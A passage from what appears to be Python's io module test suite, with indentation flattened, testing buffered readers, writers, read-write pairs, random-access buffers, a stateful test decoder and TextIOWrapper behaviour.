# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
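# Each entry: [buffer size, sizes passed to the buffered read() calls,
# expected sizes of the raw reads recorded by the mock].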
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
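# (A raw read() returning None means "no data available right now" on a
# non-blocking stream; the buffered object must return None as well once
# its own buffer is empty.)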
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550: when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so that
# checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends up in gc.garbage instead.
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead.
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
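# Interleave buffered reads (via read_func) and writes around an explicit
# flush() and check that the reported positions and the data read stay
# consistent.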
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
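# Inverse of getstate(): restore the pending byte buffer and unpack the
# packed integer back into the I and O lengths.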
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
